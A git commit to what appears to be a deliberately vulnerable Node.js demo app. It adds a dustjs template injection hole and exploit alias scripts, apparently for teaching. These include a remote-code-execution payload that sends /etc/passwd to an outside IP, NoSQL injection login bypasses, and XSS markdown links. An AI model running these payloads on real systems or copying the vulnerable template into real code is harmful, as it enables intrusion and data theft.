Merge pull request #100 from guypod/master

guypod · web-flow · commit 130e7dd9a304 · 2017-08-31T16:12:21.000+01:00
Add dustjs vulnerability and exploits
diff --git a/app.js b/app.js
@@ -10,7 +10,7 @@ var crypto         = require('crypto');
 var express        = require('express');
 var http           = require('http');
 var path           = require('path');
-var engine         = require('ejs-locals');
+var ejsEngine      = require('ejs-locals');
 var cookieParser   = require('cookie-parser');
 var bodyParser     = require('body-parser');
 var methodOverride = require('method-override');
@@ -19,13 +19,18 @@ var errorHandler   = require('errorhandler');
 var optional       = require('optional');
 var marked         = require('marked');
 var fileUpload     = require('express-fileupload');
+var dust           = require('dustjs-linkedin');
+var dustHelpers   = require('dustjs-helpers');
+var cons           = require('consolidate');
 
 var app    = express();
 var routes = require('./routes');
 
 // all environments
 app.set('port', process.env.PORT || 3001);
-app.engine('ejs', engine);
+app.engine('ejs', ejsEngine);
+app.engine('dust', cons.dust);
+cons.dust.helpers = dustHelpers;
 app.set('views', path.join(__dirname, 'views'));
 app.set('view engine', 'ejs');
 app.use(logger('dev'));
@@ -45,6 +50,7 @@ app.get('/destroy/:id', routes.destroy);
 app.get('/edit/:id', routes.edit);
 app.post('/update/:id', routes.update);
 app.post('/import', routes.import);
+app.get('/about_new', routes.about_new);
 // Static
 app.use(st({path: './public', url: '/public'}));
 
diff --git a/exploits/dustjs-exploits.sh b/exploits/dustjs-exploits.sh
@@ -0,0 +1,17 @@
+if [ -z "$GOOF_HOST" ]; then
+	export GOOF_HOST=http://localhost:3001
+fi
+
+# Simple request
+alias dust1="curl $GOOF_HOST'/about_new?device=Desktop'"
+
+# Request with array
+alias dust2="curl $GOOF_HOST'/about_new?device\[\]=Desktop'"
+
+# Trigger error
+alias dust3="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27'"
+
+# Simple RCE, logs to console
+alias dust4="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-console.log(%27FrontendConf%20Was%20Here%27)-%27'"
+
+alias dust5="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-require(%27child_process%27).exec(%27curl%20-m%203%20-F%20%22x%3D%60cat%20%2Fetc%2Fpasswd%60%22%20http%3A%2F%2F34.205.135.170%2F%27)-%27'"
diff --git a/exploits/exploit-aliases.sh b/exploits/exploit-aliases.sh
@@ -3,3 +3,5 @@
 source mongoose-exploits.sh
 source st-exploits.sh
 source ms-exploits.sh
+source nosql-exploits.sh
+source dustjs-exploits.sh
diff --git a/exploits/marked-exploit.sh b/exploits/marked-exploit.sh
@@ -10,10 +10,10 @@ This is **markdown**
 # Failed XSS
 [Gotcha](javascript:alert(1))
 
-# Successfull XSS using vuln
+# Failed XSS despite URL encoding
 [Gotcha](javascript&#58;alert(1&#41;)
 
-# Successfull XSS using vuln
+# Successfull XSS using vuln and browser interpretation
 [Gotcha](javascript&#58this;alert(1&#41;)
 
 # Most boasty exploit
diff --git a/exploits/nosql-exploits.sh b/exploits/nosql-exploits.sh
@@ -0,0 +1,20 @@
+
+if [ -z "$GOOF_HOST" ]; then
+	export GOOF_HOST=http://localhost:3001
+fi
+
+# Default working case - form fill
+alias ns1="echo -n 'username=admin&password=SuperSecretPassword' | http --form $GOOF_HOST/admin -v"
+
+# JSON working login
+alias ns2='echo '"'"'{"username":"admin", "password":"SuperSecretPassword"}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# failed login
+alias ns3='echo '"'"'{"username":"admin", "password":"WrongPassword"}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# successful login, NOSQL Injection, knowing the username
+alias ns4='echo '"'"'{"username": "admin", "password": {"$gt": ""}}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# successful login, NOSQL Injection, without knowing the username
+alias ns5='echo '"'"'{"username": {"$gt": ""}, "password": {"$gt": ""}}'"'"' | http --json $GOOF_HOST/admin -v'
+
diff --git a/exploits/nosql-injection.sh b/exploits/nosql-injection.sh
diff --git a/package.json b/package.json
@@ -16,6 +16,9 @@
     "body-parser": "1.9.0",
     "cfenv": "^1.0.4",
     "cookie-parser": "1.3.3",
+    "consolidate": "0.14.5",
+    "dustjs-linkedin": "2.5.0",
+    "dustjs-helpers": "1.5.0",
     "ejs": "1.0.0",
     "ejs-locals": "1.0.2",
     "errorhandler": "1.2.0",
diff --git a/routes/index.js b/routes/index.js
@@ -194,3 +194,13 @@ exports.import = function (req, res, next) {
 
   res.redirect('/');
 };
+
+exports.about_new = function (req, res, next) {
+    console.log(JSON.stringify(req.query));
+    return res.render("about_new.dust",
+      {
+        title: 'Goof TODO',
+        subhead: 'Vulnerabilities at their best',
+        device: req.query.device
+      });
+};
diff --git a/views/about_new.dust b/views/about_new.dust
@@ -0,0 +1,18 @@
+<!DOCTYPE html>
+<html>
+
+{@if cond="'{device}'=='Desktop'"}
+  <body style="font-size: medium; text-align: center;">
+{:else}
+  <body style="font-size: x-large; text-align: center;">
+{/if}
+
+  <h1 id="page-title">{title}</h1>
+  <h2 id="page-title">{subhead}</h2>
+
+  <p>The BESTest todo app evar</p>
+
+  <div style="position:absolute; bottom:0;">Device string (debug): {device}</div>
+
+  </body>
+</html>
